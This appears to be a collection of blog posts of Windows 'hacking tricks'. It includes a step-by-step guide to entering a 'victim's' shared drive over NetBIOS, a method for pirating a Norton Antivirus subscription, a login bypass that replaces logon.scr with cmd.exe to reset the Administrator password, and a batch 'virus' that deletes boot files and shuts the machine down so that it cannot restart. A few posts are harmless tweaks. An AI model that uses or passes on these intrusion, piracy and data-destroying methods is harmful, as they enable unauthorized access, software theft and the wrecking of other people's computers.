Netbios hacking



NetBios hacking for windows 95/98/ME/NT/XP
____________________________________________________


Step 1
Get a IP (range) scanner. (superscanner is a fast one).
Scan the victim's ip on TCP/IP port 139

Step 2
Open a dos prompt
Do this by going to start/run
enter command.com and press ok

this is what you see:
c:windows>

This is what you need to type down:
Replace 255.255.255.255 with the victims IP address.

c:windows>nbtstat -a 255.255.255.255

If you see this your in:

NetBIOS Remote Machine Name Table

Name Type Status
---------------------------------------------------------------
user<00> UNIQUE Registered
workgroup <00> GROUP Registered
user <03> UNIQUE Registered
user <20> UNIQUE Registered

MAC Address = xx-xx-xx-xx-xx-xx
---------------------------------------------------------------

If you don't get the number <20>.
The victim disabled the File And Printer Sharing, find a another victim.

Step 3

type down:

c:windows>net view 255.255.255.255

if the output is like this:

Shared resources at 255.255.255.255
ComputerNameGoesHere

Sharename Type Used as Comment

------------------------------------------------------------
C DISK Disk xxxxx xxxxx


The command completed successfully.


"DISK" shows that the victim is sharing a Disk named as CDISK

Step 4

type down:
you can replace x: by anything letter yopu want but not your own drive letters.
C DISK is the name of the shared hard drive.

c:windows>net use x: 255.255.255.255CDISK

If the command is successful we will get the confirmation.
The command was completed successfully

Now open windows explorer or just double click on the My Computer icon on your desktop and you will see a new network drive X:> . Now you are a small time hacker.
Good luck.

Posted in Labels: | 0 comments

Lock the folder without using any software...


Lock the folder without using any software...
_______________________________________________

Steps:-

1.Suppose you have a folder named abcd in D:\abcd.

2.In the same drive next to the folder create a new notepad file with the exact statement
ren abcd abcd.{21EC2020-3AEA-1069-A2DD-08002B30309D}

3.Now save this text file as loc.bat

4.Create another notepad file and type
ren abcd.{21EC2020-3AEA-1069-A2DD-08002B30309D} abcd

5.Save this as key.bat

6.Now there are two batch files. Double click loc.bat and your folder will change into Control Panel and its contents cannot be viewed.

7.To open the folder double click key.bat and you get back your original folder.

8.For more safety keep the key.bat in another location .Only for unlocking copy paste to the original location and double click .


If you combine this with the hidden folder trick, it will be impossible for anyone else to access it

Posted in Labels: | 0 comments

Triple your download speed


Triple your download speed
________________________________________________

Way:-

open NOTEPAD Save this file as tweak.reg

REGEDIT4
[HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Servic es\Tcpip\Parameters]
"TcpWindowSize"=dword:faf0
"Tcp1323Opts"=dword:0



If you want to undo it, incase it messed u up, save this file as undo.inf


[Version]
signature=$CHICAGO$

[DefaultInstall]
DelReg=Delete_Reg_Entries


[Delete_Reg_Entries]
HKLM,System\CurrentControlSet\Services\Tcpip\Param eters,TcpWindowSize
HKLM,System\CurrentControlSet\Services\Tcpip\Param eters,Tcp1323Opts




Right click on undo.inf and click install (to undo tweak)

Reboot ur comp for it to take effect

Posted in Labels: | 0 comments

Norton Trick..


How to install Norton Antivirus 2008 with max 10 year subscription.
_______________________________________________

Note:- Please read and use it carefully...

Before we begin lets create a restore point on your computer using
system restore if it off turn it on. Just in case you do something wrong.

Does this work? Yeah i thought the same thing when i first tried it but
yes it works 100% and it was on vista sp1. Will it work on xp? it should!

This takes a fair amount of time.

Step 1: Find a copy of norton antivirus 2007 with a 10 year subscription
and activate it. Its not that hard to find.

Step 2: Now go to program files\norton antivirus

Step 3: see the file called CLTVault.dll copy that file and paste it somewhere
else for use later. Remember where you put it ok?

Step 4: Uninstall Norton 2007. when its done restart your pc when it asks you to.

Step 5: Change your date to 01/01/2020. Yes i said it 01/01/2020 why? because its
apparently crucial to do it otherwise it won't work. It might if you don't change your time but i dont recommend it.

Step 6: Go to the net and download the Norton antivirus 2008 trial version.

Step7: Install it. when your done restart your pc when it asks you to and finish the installing process. When it asks
to activate it just ignore it as well as the windows security alert(its just whinging everything will be fine)

Step 8: Go to 'msconfig'. For vista uses type that in your search box.

Step 9: Disable anything to do with the symantec corporation. Please be cautious here as an incorrect mistake could
render your pc to not work properly.

Step 10: Restart your pc.

Step 11: Restart a second time but this time in safe mode. To do this just press F8 just after the boot screen (usually the
manufactures logo). Doing it before might make your pc beep loudly because its an unrecognized bios command.

Step 12: While in safe mode go to program files\norton antivirus and delete CLTVault.dll. Yes do it.
Now find your old version of CLTVault.dll that you copied earlier in step 3 and paste it in program files\norton antivirus.
Why safe mode because in normal mode symantec has a clever way of not letting you modify its system files by denying
any attempts. However in safe mode its not there at all.

Step 13: Restart in normal mode

Step 14: Go to msconfig and reenable all the stuff from symantec corporation.

Step 15: Restart again. go to NAV 2008 and press fix now. Now it will try to activate your copy by contacting
over the net however this fails and it says try again or activate later. Ignore this because at the same time it is activating your old
subscription days left from NAV 2007. When it does it will say in the place NAV 2007 said it.

Step 16: Now it will whinge about updating via liveupdate.you can however it will fail. Don't panic!Ignore the window security centre whinging.Also reset
your date to the present.

Step 17: restart your pc and everythings fine.you can liveupdate now successfully and after a quick scan norton is happy and you have now a fully installed
NAV 2008.

Now some of you might have problems just follow the steps accurately and everything will be like clockwork.Enjoy!!!

Posted in Labels: | 0 comments

Change your computer password..


Change ur password
________________________________________________

Steps:-

1. Restart you computer

2.When booting, press F8 and select "Safe Mode"

3.After getting to the user menu. Click on a user and
this time it will not ask you for a password

4.Go to Start>Run and type "CMD" (without the quotes).

5.At command prompt type in "cd C:Windows\System32"
(without the quotes), I am assuming C is your System/Windows Drive

6.For safety purposes first make a backup of your Logon.Scr file..
You can do this by typing in "Copy to Logon.scr to Logon.bak" (without the quotes)

7.Then type "copy CMD.EXE Logon.scr"(without the quotes)

8.Then type this command, I will assume that you want to set Administrator's password
to "MyNewPass" (without the quotes)

9.Now, type this in (I am assuming that you are still in the directory C:WindowsSystem32) ,
"net user administrator MyNewPass" without the quotes

10. You will get a message saying that it was successful, this means Administrator's new password is "MyNewPass" (without the quotes)

11. Restart the PC and you will login as Administrator (or whatever you chose to reset) with your chosen password

Posted in Labels: | 0 comments

Virus that crashesh your own pc


Virus that crashesh your own pc
________________________________________________

Coding:-

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini
@echo off
msg * YOU GOT OWNED!!!
shutdown -s -t 7 -c "A VIRUS IS TAKING OVER c:Drive


save as bat file in notepad!! This will pop up a message saying OWNED!! and shut down the computer never to reboot again! Type this in notepad start virus.bat virus.bat

Posted in Labels: | 0 comments